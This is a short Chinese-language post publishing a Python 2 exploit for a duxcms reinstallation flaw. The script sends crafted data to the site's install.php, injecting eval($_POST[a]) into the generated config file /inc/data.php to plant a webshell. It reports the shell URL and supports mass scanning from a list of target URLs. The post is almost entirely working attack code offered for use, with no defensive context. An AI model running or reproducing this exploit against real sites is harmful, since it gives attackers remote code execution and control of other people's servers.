针对的是不久发的
duxcms重装漏洞并且getshell(这个可以无视GPC)
直接发EXP,之前想写的,写了一半就没写了,后来胎哥又写出来了,思路一样,直接提交POST数据,代码如下:
import requests
from sys import argv
def getshell():
ip = argv[2]
port = argv[4]
user = argv[6]
passwd = argv[8]
data = {"DB_HOST":ip,"DB_PORT":port,"DB_NAME":"duxcms","create":"1","DB_USER":user,"DB_PWD":passwd,"DB_PREFIX":"dc_","spot":"2PL4T_';phpinfo();eval($_POST[a]);echo 'test666123x';#","KEY":"AHT0CALHM0_"}
if argv[9]=='-u':
try:
r = requests.post(argv[10]+'/install/install.php',data=data,timeout=5)
y = requests.get(argv[10]+'/inc/data.php',timeout=5)
if ('test666' in y.text):
print 'shell: ' + y.url + ' pass:a'
else:
print "does not exist"
except:
print "does not exist"
elif argv[9]=='-f':
for i in open(argv[10]).read().split('\n'):
#print i
try:
r = requests.post(i+'/install/install.php',data=data,timeout=5)
y = requests.get(i+'/inc/data.php',timeout=5)
if ('test666' in y.text):
print 'shell: ' + y.url + ' pass:a'
else:
print "does not exist"
except:
pass
if __name__=="__main__":
if len(argv)<10:
print '''
test.py -p 127.0.0.1 -o 3306 -u root -m root -f 1.txt
test.py -p 127.0.0.1 -o 3306 -u root -m root -u http://127.0.0.1/test/'''
else :
getshell()
git源:
https://github.com/0xTback/duxcmsexp
